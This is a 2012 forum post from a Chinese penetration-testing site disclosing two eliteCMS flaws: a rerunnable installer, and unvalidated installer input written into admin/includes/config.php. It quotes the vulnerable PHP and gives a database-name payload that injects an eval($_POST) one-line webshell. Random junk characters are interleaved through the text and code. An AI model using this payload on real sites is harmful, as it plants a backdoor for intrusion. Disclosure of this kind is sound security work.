中国网络渗透测试联盟

标题: eliteCMS安装文件未验证 + 一句话写入安全漏洞 [打印本页]
作者: admin    时间: 2012-11-18 13:59
标题: eliteCMS安装文件未验证 + 一句话写入安全漏洞
eliteCMS的安装程序安装结束后未作锁定,导致黑客可以通过访问安装程序地址进行重复安装
0 k+ B: z0 v, q8 y. p* n
+ a9 s; D5 L' \9 Y( q; f6 E另外一个漏洞是安装程序可以直接写入一句话到admin/includes/config.php. G& |7 J/ r# J* f& F
我们来看代码:
5 w' R! s# A# _$ L
* l7 A! o+ `: ~& I...
  z8 o% ]* p4 n# Xelseif ($_GET['step'] == "4") {
8 e' V& L% j4 Y2 @# @5 U4 k3 x    $file = "../admin/includes/config.php";4 g* f: E% E$ d' y1 e4 N
    $write = "<?php\n";
* s# |1 k( u( T! c: k+ h/ o1 K    $write .= "/**\n";* n% F4 x. u" `
    $write .= "*\n";
$ @' W3 z0 ^5 l: W; _3 _    $write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";; K. e" w$ D6 Y9 g& G" u5 p( D
...略...* |4 R1 J+ p! {$ ?4 s
    $write .= "*\n";, Z! T0 @. i' j$ h' X- _5 l
    $write .= "*/\n";0 W- W) u% O, y3 K( O
    $write .= "\n";& w5 z. J+ ?- L* J6 s8 \
    $write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";
3 d1 d2 }7 X$ v" r    $write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";8 m- \7 V' k' k0 P2 G  A
    $write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";. \8 f2 \" B$ N. ~2 h! L
    $write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";
. e% }' _! {% N" ^# t    $write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";
; T, N, g. i' H- ]' D1 `: K    $write .= "if (!\$connection) {\n";& [& l  q3 H' i& Y5 _& A
    $write .= "        die(\"Database connection failed\" .mysql_error());\n";4 ^$ I) [; s! r3 K8 |+ n4 l+ e  L
    $write .= "        \n";
- y3 P  s+ O8 ~    $write .= "} \n";: {' K. g9 g2 v0 i3 E1 t- ^
    $write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";. a( f- E' j4 ]9 Z) X' E- W2 i! h3 `
    $write .= "if (!\$db_select) {\n";
/ q) S& T9 y/ O2 i% s/ R& d# Q8 C    $write .= "        die(\"Database select failed\" .mysql_error());\n";: z6 r) Q$ z7 i' Z0 {7 j6 l: I1 ]
    $write .= "        \n";
  a* j" ?5 A7 `" h; z0 S    $write .= "} \n";+ v8 G; R0 b; S
    $write .= "?>\n";
; E7 h9 `5 J& y! U1 H: D: @2 o
& ?8 U# q1 Q* Q5 O8 l) n! l1 {    $writer = fopen($file, 'w');) u$ N2 j; M( P9 q
..., F6 N! f4 _: _$ v
7 ^6 {6 X; }# a1 S" z
在看代码:
$ O1 J, J4 T4 o0 i* Y
' X( C! r& F4 a$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];; k4 M' Q9 j. B
$_SESSION['DB_NAME'] = $_POST['DB_NAME'];
4 u" I& S0 x5 x, i* h2 n1 j4 U$_SESSION['DB_USER'] = $_POST['DB_USER'];9 |; D4 m, {: }5 ?9 e" d$ K
$_SESSION['DB_PASS'] = $_POST['DB_PASS'];
8 G  _* w: g" {
7 e$ |; p, n1 {" ]/ j取值未作任何验证+ m: x* V% j/ }9 j* X, A# m0 _
如果将数据库名POST数据:) _* Y! J& S$ r' N& L

/ i+ ^- {: N6 i  U( R2 }"?><?php eval($_POST[c]);?><?php
& P1 K6 s% X- g' J6 B& K# N
6 r( X9 o3 n2 n( O( Q( M/ |将导致一句话后门写入/admin/includes/config.php  \( {! |0 |: M! p




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2